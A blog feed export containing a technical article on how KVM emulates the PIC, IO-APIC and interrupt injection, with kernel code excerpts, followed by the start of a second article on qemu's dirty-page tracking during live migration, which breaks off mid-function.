kvm interrupt emulation2018-08-27T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/27/kvm-interrupt-emulation
<h3> External interrupt </h3>
<p>First of all, let’s clarify the external interrupt in kvm. This kind of interrupt means an interrupt for the host. A VM-exit is caused when the CPU receives an external interrupt while the guest is running. This is configured by the flag PIN_BASED_EXT_INTR_MASK, which is written to the VMCS’s pin-based VM-execution control field in the function setup_vmcs_config. When an external interrupt comes, kvm calls the handle_external_intr callback.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kvm_x86_ops->handle_external_intr(vcpu);
</code></pre></div></div>
<p>For Intel CPUs, this is ‘vmx_handle_external_intr’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_handle_external_intr(struct kvm_vcpu *vcpu)
{
u32 exit_intr_info = vmcs_read32(VM_EXIT_INTR_INFO);
/*
* If external interrupt exists, IF bit is set in rflags/eflags on the
* interrupt stack frame, and interrupt will be enabled on a return
* from interrupt handler.
*/
if ((exit_intr_info & (INTR_INFO_VALID_MASK | INTR_INFO_INTR_TYPE_MASK))
== (INTR_INFO_VALID_MASK | INTR_TYPE_EXT_INTR)) {
unsigned int vector;
unsigned long entry;
gate_desc *desc;
struct vcpu_vmx *vmx = to_vmx(vcpu);
#ifdef CONFIG_X86_64
unsigned long tmp;
#endif
vector = exit_intr_info & INTR_INFO_VECTOR_MASK;
desc = (gate_desc *)vmx->host_idt_base + vector;
entry = gate_offset(*desc);
asm volatile(
#ifdef CONFIG_X86_64
"mov %%" _ASM_SP ", %[sp]\n\t"
"and $0xfffffffffffffff0, %%" _ASM_SP "\n\t"
"push $%c[ss]\n\t"
"push %[sp]\n\t"
#endif
"pushf\n\t"
"orl $0x200, (%%" _ASM_SP ")\n\t"
__ASM_SIZE(push) " $%c[cs]\n\t"
"call *%[entry]\n\t"
:
#ifdef CONFIG_X86_64
[sp]"=&r"(tmp)
#endif
:
[entry]"r"(entry),
[ss]"i"(__KERNEL_DS),
[cs]"i"(__KERNEL_CS)
);
} else
local_irq_enable();
}
</code></pre></div></div>
<p>Here it checks whether a valid external interrupt exists (INTR_INFO_VALID_MASK). If there is one, it just calls the host interrupt handler.</p>
<p>That’s easy, nothing mysterious.</p>
<h3> Interrupt delivery methods </h3>
<p>There are three generations of interrupt delivery and servicing on Intel architecture: XT-PIC for legacy uni-processor (UP) systems, IO-APIC for modern UP and multi-processor (MP) systems, and MSI.</p>
<h4> XT-PIC </h4>
<p>XT-PIC is the oldest form of interrupt delivery. It uses two Intel 8259 PIC chips, and each PIC chip has eight interrupt lines.</p>
<p><img src="/assets/img/kvminterrupt/1.png" alt="" /></p>
<p>When a connected device needs servicing by the CPU, it drives the signal on the interrupt pin to which it is connected. The 8259 PIC in turn drives the interrupt line into the CPU. From the Intel 8259 PIC, the OS is able to determine what interrupt is pending. The CPU masks that interrupt and begins running the ISR associated with it. The ISR will check with the device with which it is associated for a pending interrupt. If the device has a pending interrupt, then the ISR will clear the Interrupt Request (IRQ) pending and begin servicing the device. Once the ISR has completed servicing the device, it will schedule a tasklet if more processing is needed and return control back to the OS, indicating that it handled an interrupt. Once the OS has serviced the interrupt, it will unmask the interrupt from the Intel 8259 PIC and run any tasklet which has been scheduled. </p>
<h4> IO-APIC </h4>
<p>When Intel developed multiprocessor support, it also introduced the concept of a Local APIC (Advanced PIC) in the CPU and IO-APICs connected to devices. Each IO-APIC (82093) has 24 interrupt lines. The IO-APIC provides backwards compatibility with the older XT-PIC model. As a result, the lower 16 interrupts are usually dedicated to their assignments under the XT-PIC model. This assignment of interrupts provides only eight additional interrupts, which forces sharing. The following is the sequence for IO-APIC delivery and servicing:</p>
<ul>
<li>A device needing servicing from the CPU drives the interrupt line into the IO-APIC associated with it.</li>
<li>The IO-APIC writes the interrupt vector associated with its driven interrupt line into the Local APIC of the CPU.</li>
<li>The interrupted CPU begins running the ISRs associated with the interrupt vector it received. Each ISR for a shared interrupt is run to find the device needing service. Each device has its IRQ pending bit checked, and the requesting device has its bit cleared.</li>
</ul>
<h4> Message Signaled Interrupts (MSI) </h4>
<p>The MSI model eliminates the devices’ need to use the IO-APIC, allowing every device to write directly to the CPU’s Local APIC. The MSI model supports 224 interrupts, and, with this high number of interrupts, IRQ sharing is no longer allowed. The following is the sequence for MSI delivery and servicing:</p>
<ul>
<li>A device needing servicing from the CPU generates an MSI, writing the interrupt vector directly into the Local APIC of the CPU servicing it.</li>
<li>The interrupted CPU begins running the ISR associated with the interrupt vector it received. The device is serviced without any need to check and clear an IRQ pending bit.</li>
</ul>
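<p>The message format can be sketched with a couple of helpers (the field layout follows the Intel SDM; the function names are ours):</p>

```c
#include <assert.h>
#include <stdint.h>

/* Sketch of MSI message composition per the Intel SDM (helper names are
 * ours): the address targets a LAPIC in the 0xFEExxxxx range with the
 * destination APIC id in bits 19:12; the data carries the vector in
 * bits 7:0 and the delivery mode in bits 10:8. */
static uint32_t msi_address(uint8_t dest_apic_id)
{
    return 0xFEE00000u | ((uint32_t)dest_apic_id << 12);
}

static uint32_t msi_data(uint8_t vector, uint8_t delivery_mode)
{
    return (uint32_t)vector | (((uint32_t)delivery_mode & 0x7) << 8);
}
```

<p>A device writing msi_data(0x30, 0) to msi_address(1) injects vector 0x30 with fixed delivery into the LAPIC of APIC id 1.</p>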
<p>The following picture shows the relations of the three methods (from https://cloud.tencent.com/developer/article/1087271).</p>
<p><img src="/assets/img/kvminterrupt/2.png" alt="" /></p>
<p>For real hardware the interrupt is generated by the device itself, so in a virtualization environment the interrupt is generated by the device emulation. It can be generated either in qemu (device emulation implemented in userspace) or in kvm (device emulation implemented in kernel space).</p>
<p>When the device emulation triggers an irq (< 16), it is delivered to both the i8259 and the io-apic, and the io-apic formats the interrupt message and routes it to the lapic. So there are three interrupt controller devices that need to be emulated: the i8259, the io-apic and the lapic. All of these devices can be implemented in qemu or in kvm, or split: the pic and io-apic in qemu with the lapic in kvm.</p>
<p>Let’s first talk about the implementation in kvm.</p>
<h3> KVM implements the irqchip </h3>
<h4> The initialization of PIC and IO-APIC </h4>
<p>The PIC and IO-APIC are created by the VM ioctl ‘KVM_CREATE_IRQCHIP’. It is issued in ‘kvm_irqchip_create’ in qemu and handled in ‘kvm_arch_vm_ioctl’ in kvm.
The pic is created by the function ‘kvm_create_pic’ and assigned to ‘kvm->arch.vpic’. The creation function allocates a ‘kvm_pic’ and also registers the device’s read/write ops.</p>
<p>Following the pic, it creates the ioapic using the function ‘kvm_ioapic_init’. Like the pic, the creation function allocates a ‘kvm_ioapic’, registers the read/write ops and assigns it to ‘kvm->arch.vioapic’.</p>
<p>After creating the pic and ioapic, it calls ‘kvm_setup_default_irq_routing’ to set up the routing table.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_setup_default_irq_routing(struct kvm *kvm)
{
return kvm_set_irq_routing(kvm, default_routing,
ARRAY_SIZE(default_routing), 0);
}
int kvm_set_irq_routing(struct kvm *kvm,
const struct kvm_irq_routing_entry *ue,
unsigned nr,
unsigned flags)
{
struct kvm_irq_routing_table *new, *old;
u32 i, j, nr_rt_entries = 0;
int r;
for (i = 0; i < nr; ++i) {
if (ue[i].gsi >= KVM_MAX_IRQ_ROUTES)
return -EINVAL;
nr_rt_entries = max(nr_rt_entries, ue[i].gsi);
}
nr_rt_entries += 1;
new = kzalloc(sizeof(*new) + (nr_rt_entries * sizeof(struct hlist_head))
+ (nr * sizeof(struct kvm_kernel_irq_routing_entry)),
GFP_KERNEL);
if (!new)
return -ENOMEM;
new->rt_entries = (void *)&new->map[nr_rt_entries];
new->nr_rt_entries = nr_rt_entries;
for (i = 0; i < KVM_NR_IRQCHIPS; i++)
for (j = 0; j < KVM_IRQCHIP_NUM_PINS; j++)
new->chip[i][j] = -1;
for (i = 0; i < nr; ++i) {
r = -EINVAL;
if (ue->flags)
goto out;
r = setup_routing_entry(new, &new->rt_entries[i], ue);
if (r)
goto out;
++ue;
}
mutex_lock(&kvm->irq_lock);
old = kvm->irq_routing;
kvm_irq_routing_update(kvm, new);
mutex_unlock(&kvm->irq_lock);
synchronize_rcu();
new = old;
r = 0;
out:
kfree(new);
return r;
}
</code></pre></div></div>
<p>‘kvm_irq_routing_entry’ represents the irq routing entry. The default_routing is defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static const struct kvm_irq_routing_entry default_routing[] = {
ROUTING_ENTRY2(0), ROUTING_ENTRY2(1),
ROUTING_ENTRY2(2), ROUTING_ENTRY2(3),
ROUTING_ENTRY2(4), ROUTING_ENTRY2(5),
ROUTING_ENTRY2(6), ROUTING_ENTRY2(7),
ROUTING_ENTRY2(8), ROUTING_ENTRY2(9),
ROUTING_ENTRY2(10), ROUTING_ENTRY2(11),
ROUTING_ENTRY2(12), ROUTING_ENTRY2(13),
ROUTING_ENTRY2(14), ROUTING_ENTRY2(15),
ROUTING_ENTRY1(16), ROUTING_ENTRY1(17),
ROUTING_ENTRY1(18), ROUTING_ENTRY1(19),
ROUTING_ENTRY1(20), ROUTING_ENTRY1(21),
ROUTING_ENTRY1(22), ROUTING_ENTRY1(23),
}
</code></pre></div></div>
<p>For irqs < 16, there are two entries: one for the pic and one for the ioapic. The ioapic entry comes first.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define IOAPIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = KVM_IRQCHIP_IOAPIC, .u.irqchip.pin = (irq) }
#define ROUTING_ENTRY1(irq) IOAPIC_ROUTING_ENTRY(irq)
#ifdef CONFIG_X86
# define PIC_ROUTING_ENTRY(irq) \
{ .gsi = irq, .type = KVM_IRQ_ROUTING_IRQCHIP, \
.u.irqchip.irqchip = SELECT_PIC(irq), .u.irqchip.pin = (irq) % 8 }
# define ROUTING_ENTRY2(irq) \
IOAPIC_ROUTING_ENTRY(irq), PIC_ROUTING_ENTRY(irq)
#endif
</code></pre></div></div>
<p>Here irqchip is 0 and 1 for the two pics and 2 for the ioapic.</p>
<p>Going back to the function ‘kvm_set_irq_routing’, this function allocates a ‘kvm_irq_routing_table’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct kvm_irq_routing_table {
int chip[KVM_NR_IRQCHIPS][KVM_IRQCHIP_NUM_PINS];
struct kvm_kernel_irq_routing_entry *rt_entries;
u32 nr_rt_entries;
/*
 * Array indexed by gsi. Each entry contains list of irq chips
 * the gsi is connected to.
 */
struct hlist_head map[0];
};
</code></pre></div></div>
<p>Here ‘KVM_NR_IRQCHIPS’ is 3, means two pic chips and one io-apic chip. ‘KVM_IRQCHIP_NUM_PINS’ is 24 means the ioapic has 24 pins. Every irq has one ‘kvm_kernel_irq_routing_entry’.</p>
<p>For every ‘kvm_irq_routing_entry’, it calls ‘setup_routing_entry’ to initialize the ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int setup_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
struct kvm_kernel_irq_routing_entry *ei;
/*
* Do not allow GSI to be mapped to the same irqchip more than once.
* Allow only one to one mapping between GSI and MSI.
*/
hlist_for_each_entry(ei, &rt->map[ue->gsi], link)
if (ei->type == KVM_IRQ_ROUTING_MSI ||
ue->type == KVM_IRQ_ROUTING_MSI ||
ue->u.irqchip.irqchip == ei->irqchip.irqchip)
return r;
e->gsi = ue->gsi;
e->type = ue->type;
r = kvm_set_routing_entry(rt, e, ue);
if (r)
goto out;
hlist_add_head(&e->link, &rt->map[e->gsi]);
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>‘kvm_set_routing_entry’ sets the set callback function: for a pic irq it is ‘kvm_set_pic_irq’, for an ioapic irq it is ‘kvm_set_ioapic_irq’. Entries with the same gsi are linked through the ‘link’ field of ‘kvm_kernel_irq_routing_entry’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_routing_entry(struct kvm_irq_routing_table *rt,
struct kvm_kernel_irq_routing_entry *e,
const struct kvm_irq_routing_entry *ue)
{
int r = -EINVAL;
int delta;
unsigned max_pin;
switch (ue->type) {
case KVM_IRQ_ROUTING_IRQCHIP:
delta = 0;
switch (ue->u.irqchip.irqchip) {
case KVM_IRQCHIP_PIC_MASTER:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
break;
case KVM_IRQCHIP_PIC_SLAVE:
e->set = kvm_set_pic_irq;
max_pin = PIC_NUM_PINS;
delta = 8;
break;
case KVM_IRQCHIP_IOAPIC:
max_pin = KVM_IOAPIC_NUM_PINS;
e->set = kvm_set_ioapic_irq;
break;
default:
goto out;
}
...
}
r = 0;
out:
return r;
}
</code></pre></div></div>
<p>The following shows the structure relations.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kvm
+-------------+
| |
| |
| |
+-------------+ +---------------------+
|irq_routing +---------> | chip |
+-------------+ +---------------------+
| | | rt_entries +----------+
| | +---------------------+ |
| | | nr_rt_entries | |
+-------------+ +---------------------+ |
| hlist_head ... | |
| | |
| | |
| | |
+---------------------+ <--------+
kvm_kernel_irq_routing_entry |
| |
+---------------------+
| |
| kvm_set_pic_irq |
+---------------------+
| |
| |
+---------------------+
| |
| |
+---------------------+
</code></pre></div></div>
<h4> Interrupt injection </h4>
<p>The devices generate interrupt by calling function ‘kvm_set_irq’ in kvm.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int kvm_set_irq(struct kvm *kvm, int irq_source_id, u32 irq, int level,
bool line_status)
{
struct kvm_kernel_irq_routing_entry *e, irq_set[KVM_NR_IRQCHIPS];
int ret = -1, i = 0;
struct kvm_irq_routing_table *irq_rt;
trace_kvm_set_irq(irq, level, irq_source_id);
/* Not possible to detect if the guest uses the PIC or the
* IOAPIC. So set the bit in both. The guest will ignore
* writes to the unused one.
*/
rcu_read_lock();
irq_rt = rcu_dereference(kvm->irq_routing);
if (irq < irq_rt->nr_rt_entries)
hlist_for_each_entry(e, &irq_rt->map[irq], link)
irq_set[i++] = *e;
rcu_read_unlock();
while(i--) {
int r;
r = irq_set[i].set(&irq_set[i], kvm, irq_source_id, level,
line_status);
if (r < 0)
continue;
ret = r + ((ret < 0) ? 0 : ret);
}
return ret;
}
</code></pre></div></div>
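<p>The dispatch loop in ‘kvm_set_irq’ can be condensed into a toy model (all names here are ours, not kvm’s):</p>

```c
#include <assert.h>
#include <stddef.h>

/* Toy model (names ours) of the gsi fan-out in kvm_set_irq: each routing
 * entry carries a 'set' callback, and entries that share a gsi are
 * chained, so one gsi < 16 reaches both the pic and the ioapic. */
struct entry {
    int *chip_irr;                            /* the chip this entry targets */
    void (*set)(struct entry *e, int level);
    struct entry *next;                       /* next entry for the same gsi */
};

static void chip_set(struct entry *e, int level)
{
    if (level)
        *e->chip_irr |= 1;                    /* latch the request */
}

/* walk every entry registered for this gsi, like kvm_set_irq does */
static void set_irq(struct entry *gsi_head, int level)
{
    for (struct entry *e = gsi_head; e; e = e->next)
        e->set(e, level);
}
```

<p>With a pic entry and an ioapic entry chained on the same gsi, one call reaches both chips, matching the “set the bit in both” comment in the code above.</p>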
<p>First it finds all the ‘kvm_kernel_irq_routing_entry’ entries with the same irq and then calls their set callback functions. As we have seen, the set callback can be ‘kvm_set_ioapic_irq’ or ‘kvm_set_pic_irq’. Let’s first talk about the pic situation.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_set_pic_irq(struct kvm_kernel_irq_routing_entry *e,
struct kvm *kvm, int irq_source_id, int level,
bool line_status)
{
#ifdef CONFIG_X86
struct kvm_pic *pic = pic_irqchip(kvm);
return kvm_pic_set_irq(pic, e->irqchip.pin, irq_source_id, level);
#else
return -1;
#endif
}
int kvm_pic_set_irq(struct kvm_pic *s, int irq, int irq_source_id, int level)
{
int ret, irq_level;
BUG_ON(irq < 0 || irq >= PIC_NUM_PINS);
pic_lock(s);
irq_level = __kvm_irq_line_state(&s->irq_states[irq],
irq_source_id, level);
ret = pic_set_irq1(&s->pics[irq >> 3], irq & 7, irq_level);
pic_update_irq(s);
trace_kvm_pic_set_irq(irq >> 3, irq & 7, s->pics[irq >> 3].elcr,
s->pics[irq >> 3].imr, ret == 0);
pic_unlock(s);
return ret;
}
</code></pre></div></div>
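<p>Inside ‘pic_set_irq1’ the edge-trigger handling is essentially a rising-edge latch. A simplified sketch of that logic, with our own variable names:</p>

```c
#include <assert.h>

/* Simplified edge-trigger latch as in pic_set_irq1 (names ours): a pin
 * latches into IRR only on a 0 -> 1 transition of the line. */
struct pic_state {
    unsigned irr;       /* pending interrupt requests */
    unsigned last_irr;  /* last observed level of each line */
};

static void pic_set_irq1_edge(struct pic_state *s, int irq, int level)
{
    unsigned mask = 1u << irq;
    if (level) {
        if ((s->last_irr & mask) == 0)  /* only a rising edge latches */
            s->irr |= mask;
        s->last_irr |= mask;
    } else {
        s->last_irr &= ~mask;           /* line dropped: re-arm the pin */
    }
}
```

<p>While the line stays high no new request is latched; only after a level-0 call clears last_irr can the next level-1 call latch again, which is why an edge interrupt needs a pair of ‘kvm_set_irq’ calls per event.</p>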
<p>An edge-triggered interrupt needs two calls to ‘kvm_set_irq’: the first triggers the interrupt and the second prepares the line for the next time.</p>
<p>In ‘pic_unlock’ it kicks the vcpu so the cpu has a chance to handle the interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void pic_unlock(struct kvm_pic *s)
__releases(&s->lock)
{
bool wakeup = s->wakeup_needed;
struct kvm_vcpu *vcpu, *found = NULL;
int i;
s->wakeup_needed = false;
spin_unlock(&s->lock);
if (wakeup) {
kvm_for_each_vcpu(i, vcpu, s->kvm) {
if (kvm_apic_accept_pic_intr(vcpu)) {
found = vcpu;
break;
}
}
if (!found)
return;
kvm_make_request(KVM_REQ_EVENT, found);
kvm_vcpu_kick(found);
}
}
void kvm_vcpu_kick(struct kvm_vcpu *vcpu)
{
int me;
int cpu = vcpu->cpu;
wait_queue_head_t *wqp;
wqp = kvm_arch_vcpu_wq(vcpu);
if (waitqueue_active(wqp)) {
wake_up_interruptible(wqp);
++vcpu->stat.halt_wakeup;
}
me = get_cpu();
if (cpu != me && (unsigned)cpu < nr_cpu_ids && cpu_online(cpu))
if (kvm_arch_vcpu_should_kick(vcpu))
smp_send_reschedule(cpu);
put_cpu();
}
static void native_smp_send_reschedule(int cpu)
{
if (unlikely(cpu_is_offline(cpu))) {
WARN_ON(1);
return;
}
apic->send_IPI_mask(cpumask_of(cpu), RESCHEDULE_VECTOR);
}
</code></pre></div></div>
<p>It sends an IPI to the CPU, and later the CPU can process the interrupt.
Later in ‘vcpu_enter_guest’, it calls ‘inject_pending_event’. In ‘kvm_cpu_has_extint’, the PIC output has been set to 1, so it calls ‘kvm_queue_interrupt’ and ‘kvm_x86_ops->set_irq’. The latter callback is ‘vmx_inject_irq’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void vmx_inject_irq(struct kvm_vcpu *vcpu)
{
struct vcpu_vmx *vmx = to_vmx(vcpu);
uint32_t intr;
int irq = vcpu->arch.interrupt.nr;
trace_kvm_inj_virq(irq);
++vcpu->stat.irq_injections;
if (vmx->rmode.vm86_active) {
int inc_eip = 0;
if (vcpu->arch.interrupt.soft)
inc_eip = vcpu->arch.event_exit_inst_len;
if (kvm_inject_realmode_interrupt(vcpu, irq, inc_eip) != EMULATE_DONE)
kvm_make_request(KVM_REQ_TRIPLE_FAULT, vcpu);
return;
}
intr = irq | INTR_INFO_VALID_MASK;
if (vcpu->arch.interrupt.soft) {
intr |= INTR_TYPE_SOFT_INTR;
vmcs_write32(VM_ENTRY_INSTRUCTION_LEN,
vmx->vcpu.arch.event_exit_inst_len);
} else
intr |= INTR_TYPE_EXT_INTR;
vmcs_write32(VM_ENTRY_INTR_INFO_FIELD, intr);
}
</code></pre></div></div>
<p>Here we can see the interrupt has been written to the VMCS. Notice that in ‘kvm_cpu_get_interrupt’, in the call chain ‘kvm_cpu_get_extint’->’kvm_pic_read_irq’->’pic_intack’, the last function sets the isr and clears the irr. This means the CPU is preparing to process the interrupt (anyway, the cpu will enter the guest soon).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static inline void pic_intack(struct kvm_kpic_state *s, int irq)
{
s->isr |= 1 << irq;
/*
* We don't clear a level sensitive interrupt here
*/
if (!(s->elcr & (1 << irq)))
s->irr &= ~(1 << irq);
if (s->auto_eoi) {
if (s->rotate_on_auto_eoi)
s->priority_add = (irq + 1) & 7;
pic_clear_isr(s, irq);
}
}
</code></pre></div></div>
<p>This is the story of PIC emulation. Now let’s see ‘kvm_set_ioapic_irq’. This function just calls ‘kvm_ioapic_set_irq’. After ‘ioapic_service’->’ioapic_deliver’->’kvm_irq_delivery_to_apic’, we finally deliver the interrupt to the lapic. This function tries to find a vcpu to deliver to, then calls ‘kvm_apic_set_irq’ to set the lapic’s irq.</p>
<p>This is the story of interrupt (software) virtualization. As we can see, every interrupt needs a VM-exit, which makes a heavy virtualization overhead. Next time we will see how hardware assists interrupt virtualization.</p>
qemu/kvm dirty pages tracking in migration2018-08-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/08/11/dirty-pages-tracking-in-migration
<p>Most of live migration’s work is to migrate the RAM of the guest from the src host to the dest host.
So qemu needs to track the dirty pages of the guest to transfer them to the dest host.
This article discusses how qemu does the tracking work.</p>
<p>In a summary, the following steps show the overview of dirty tracking:</p>
<ol>
<li>qemu allocates a bitmap and sets all its bits to 1 (meaning dirty)</li>
<li>qemu calls kvm to set memory slots with the ‘KVM_MEM_LOG_DIRTY_PAGES’ flag</li>
<li>qemu calls kvm to get the kvm dirty bitmap</li>
<li>qemu kvm wrapper: walks the dirty bitmap (from kvm) and fills the dirty bitmap (ram_list)</li>
<li>migration code: walks the ram_list dirty bitmap and sets the qemu dirty page bitmap</li>
</ol>
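<p>The steps above can be reduced to a toy model (names ours): kvm collects writes in its bitmap, and each sync ORs that into qemu’s migration bitmap and clears the kvm side, mirroring the fetch-and-clear behaviour of ‘KVM_GET_DIRTY_LOG’:</p>

```c
#include <assert.h>

/* Toy model of the dirty-tracking loop (all names ours): writes land in
 * the "kvm" bitmap; a sync propagates them to the "qemu" migration
 * bitmap and clears the kvm side for the next round. */
static unsigned long kvm_bitmap;   /* per-slot bitmap kept by kvm  */
static unsigned long qemu_bitmap;  /* migration bitmap kept by qemu */

static void guest_write(int gfn)
{
    kvm_bitmap |= 1ul << gfn;      /* write fault marks the page dirty */
}

static void sync_dirty_log(void)
{
    qemu_bitmap |= kvm_bitmap;     /* steps 3-5: fetch and merge */
    kvm_bitmap = 0;                /* kvm side is cleared on fetch */
}
```

<p>Repeated syncs are idempotent for pages that were not re-dirtied, which is what lets the migration loop converge.</p>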
<h3> qemu and kvm create bitmap </h3>
<p>In the ram migration setup function, it allocates the qemu bitmap in function ‘ram_save_init_globals’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
...
qemu_mutex_lock_iothread();
qemu_mutex_lock_ramlist();
rcu_read_lock();
bytes_transferred = 0;
reset_ram_globals();
ram_bitmap_pages = last_ram_offset() >> TARGET_PAGE_BITS;
migration_bitmap_rcu = g_new0(struct BitmapRcu, 1);
migration_bitmap_rcu->bmap = bitmap_new(ram_bitmap_pages);
bitmap_set(migration_bitmap_rcu->bmap, 0, ram_bitmap_pages);
...
/*
* Count the total number of pages used by ram blocks not including any
* gaps due to alignment or unplugs.
*/
migration_dirty_pages = ram_bytes_total() >> TARGET_PAGE_BITS;
memory_global_dirty_log_start();
migration_bitmap_sync();
qemu_mutex_unlock_ramlist();
qemu_mutex_unlock_iothread();
rcu_read_unlock();
return 0;
}
</code></pre></div></div>
<p>As we can see, ‘migration_bitmap_rcu’ is the bitmap that qemu maintains.</p>
<p>Then it calls ‘memory_global_dirty_log_start’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void memory_global_dirty_log_start(void)
{
global_dirty_log = true;
MEMORY_LISTENER_CALL_GLOBAL(log_global_start, Forward);
/* Refresh DIRTY_LOG_MIGRATION bit. */
memory_region_transaction_begin();
memory_region_update_pending = true;
memory_region_transaction_commit();
}
</code></pre></div></div>
<p>This sets ‘global_dirty_log’ to true and commits the memory change to kvm (for update).</p>
<p>It then calls ‘address_space_update_topology_pass’ and will call the ‘log_start’ for every MemoryRegionSection.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (adding) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, region_nop);
if (frnew->dirty_log_mask & ~frold->dirty_log_mask) {
MEMORY_LISTENER_UPDATE_REGION(frnew, as, Forward, log_start,
frold->dirty_log_mask,
frnew->dirty_log_mask);
}
</code></pre></div></div>
<p>For kvm it is ‘kvm_log_start’. We can see in ‘kvm_mem_flags’ that it adds the ‘KVM_MEM_LOG_DIRTY_PAGES’ flag.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int kvm_mem_flags(MemoryRegion *mr)
{
bool readonly = mr->readonly || memory_region_is_romd(mr);
int flags = 0;
if (memory_region_get_dirty_log_mask(mr) != 0) {
flags |= KVM_MEM_LOG_DIRTY_PAGES;
}
if (readonly && kvm_readonly_mem_allowed) {
flags |= KVM_MEM_READONLY;
}
return flags;
}
</code></pre></div></div>
<p>The following stack backtrace shows the call chain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) bt
#0 kvm_set_user_memory_region (kml=0x55ab8fc502c0, slot=0x55ab8fc50500) at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:236
#1 0x000055ab8df10a92 in kvm_slot_update_flags (kml=0x55ab8fc502c0, mem=0x55ab8fc50500, mr=0x55ab8fd36f70)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:376
#2 0x000055ab8df10b1f in kvm_section_update_flags (kml=0x55ab8fc502c0, section=0x7f0ab37fb4c0)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:389
#3 0x000055ab8df10b65 in kvm_log_start (listener=0x55ab8fc502c0, section=0x7f0ab37fb4c0, old=0, new=4)
at /home/liqiang02/qemu0711/qemu-2.8/kvm-all.c:404
#4 0x000055ab8df18b33 in address_space_update_topology_pass (as=0x55ab8ea21880 <address_space_memory>, old_view=0x7f0cc4118ca0,
new_view=0x7f0aa804d380, adding=true) at /home/liqiang02/qemu0711/qemu-2.8/memory.c:854
#5 0x000055ab8df18d9b in address_space_update_topology (as=0x55ab8ea21880 <address_space_memory>)
at /home/liqiang02/qemu0711/qemu-2.8/memory.c:886
#6 0x000055ab8df18ed6 in memory_region_transaction_commit () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:926
#7 0x000055ab8df1c9ef in memory_global_dirty_log_start () at /home/liqiang02/qemu0711/qemu-2.8/memory.c:2276
#8 0x000055ab8df30ce6 in ram_save_init_globals () at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1939
#9 0x000055ab8df30d36 in ram_save_setup (f=0x55ab90d874c0, opaque=0x0) at /home/liqiang02/qemu0711/qemu-2.8/migration/ram.c:1960
#10 0x000055ab8df3609a in qemu_savevm_state_begin (f=0x55ab90d874c0, params=0x55ab8ea0178c <current_migration+204>)
at /home/liqiang02/qemu0711/qemu-2.8/migration/savevm.c:956
#11 0x000055ab8e25d9b8 in migration_thread (opaque=0x55ab8ea016c0 <current_migration>) at migration/migration.c:1829
#12 0x00007f0cda1fd494 in start_thread () from /lib/x86_64-linux-gnu/libpthread.so.0
#13 0x00007f0cd9f3facf in clone () from /lib/x86_64-linux-gnu/libc.so.6
</code></pre></div></div>
<p>Here we know the memory topology doesn’t change; only the ‘KVM_MEM_LOG_DIRTY_PAGES’ flag is added.</p>
<p>Now let’s go to the kvm part. As we can see, qemu sends the ‘KVM_SET_USER_MEMORY_REGION’ ioctl
and the kernel goes to ‘__kvm_set_memory_region’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __kvm_set_memory_region(struct kvm *kvm,
const struct kvm_userspace_memory_region *mem)
{
if (npages) {
if (!old.npages)
change = KVM_MR_CREATE;
else { /* Modify an existing slot. */
if ((mem->userspace_addr != old.userspace_addr) ||
(npages != old.npages) ||
((new.flags ^ old.flags) & KVM_MEM_READONLY))
goto out;
if (base_gfn != old.base_gfn)
change = KVM_MR_MOVE;
else if (new.flags != old.flags)
change = KVM_MR_FLAGS_ONLY;
else { /* Nothing to change. */
r = 0;
goto out;
}
}
...
/* Allocate page dirty bitmap if needed */
if ((new.flags & KVM_MEM_LOG_DIRTY_PAGES) && !new.dirty_bitmap) {
if (kvm_create_dirty_bitmap(&new) < 0)
goto out_free;
}
...
}
</code></pre></div></div>
<p>The most important work here is to call ‘kvm_create_dirty_bitmap’ to allocate a bitmap.
For every memslot it allocates memslot->dirty_bitmap in this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/*
 * Allocation size is twice as large as the actual dirty bitmap size.
 * See x86's kvm_vm_ioctl_get_dirty_log() why this is needed.
 */
static int kvm_create_dirty_bitmap(struct kvm_memory_slot *memslot)
{
unsigned long dirty_bytes = 2 * kvm_dirty_bitmap_bytes(memslot);
